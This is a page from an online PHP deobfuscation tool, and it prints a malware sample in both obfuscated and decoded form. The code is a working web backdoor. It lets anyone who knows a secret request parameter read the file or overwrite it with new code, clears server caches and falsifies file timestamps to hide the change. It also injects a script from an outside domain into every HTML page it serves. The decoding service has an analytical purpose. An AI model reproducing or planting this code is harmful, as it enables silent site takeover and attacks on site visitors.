Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if(isset($_REQUEST["s0788\171\x37\x69\171\60\x712\x6f\153\70\142"])){ if(empty($_REQU..
Decoded Output download
<? if(isset($_REQUEST["s0788y7iy0q2ok8b"])){
if(empty($_REQUEST["s0788y7iy0q2ok8b"])){
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
} else {
header("X-LiteSpeed-Purge: *");
if(function_exists("opcache_reset")){
@opcache_reset();
}
if(function_exists("apc_clear_cache")){
@apc_clear_cache();
}
$joc6p8=filemtime(__FILE__);$o22r67=fileatime(__FILE__);
echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["s0788y7iy0q2ok8b"]))));
@touch(__FILE__,$joc6p8+1,$o22r67+1);
}
die;
}
if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){
function tw2g6a($joc6p8){
return str_replace("</head>","<script type='text/javascript' async src='https://rkrnp5ib.cloudfire.quest/challenge.js'></script></head>",$joc6p8);
}
ob_start("tw2g6a");
} ?>
Did this file decode correctly?
Original Code
if(isset($_REQUEST["s0788\171\x37\x69\171\60\x712\x6f\153\70\142"])){
if(empty($_REQUEST["\1630\x37\x38\x38\1717i\x790\x71\x32o\x6b\x38\x62"])){
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
} else {
header("X\x2d\114iteS\160\145\145d\x2dP\x75\x72\x67e\72\40\52");
if(function_exists("\x6fpc\141\x63h\145_\162\145se\x74")){
@opcache_reset();
}
if(function_exists("\141\x70c\137\143\x6c\x65\x61\x72\x5f\143\x61\x63he")){
@apc_clear_cache();
}
$joc6p8=filemtime(__FILE__);$o22r67=fileatime(__FILE__);
echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["\x73\60\67\x38\x38\x79\x37i\171\x30\x71\62\x6fk\x38\142"]))));
@touch(__FILE__,$joc6p8+1,$o22r67+1);
}
die;
}
if(isset($_SERVER["\x48T\x54\x50\x5f\101CC\x45\120\x54"])&&(strpos($_SERVER["\x48T\124P_A\103\x43E\x50\x54"],"\164\x65\170\x74\57\x68\x74m\154")!==false||$_SERVER["\110\124\124P\x5f\101CCE\x50\124"]==="*\x2f\x2a")){
function tw2g6a($joc6p8){
return str_replace("\74\x2fh\x65\141\x64\76","<s\143\162\151p\x74 \x74\171\x70\x65='\x74\145\170\x74\57j\x61\166\141\x73cri\160t' \141s\x79n\143\40\163\162c=\47\150t\164\160\x73\x3a/\57\x72\153\x72\156\x70\x35\151\142.cl\x6f\165d\146\151\x72\x65\56qu\x65\163\x74\x2f\143\x68\141\154\x6c\x65n\x67e\x2e\x6as\x27\x3e\74\57s\143\x72i\x70\164\x3e<\57\150\145\141\x64\76",$joc6p8);
}
ob_start("t\x77\62\x676\x61");
}
Function Calls
strpos | 1 |
Stats
MD5 | 7d698419dfee871c29924a8564911c07 |
Eval Count | 0 |
Decode Time | 98 ms |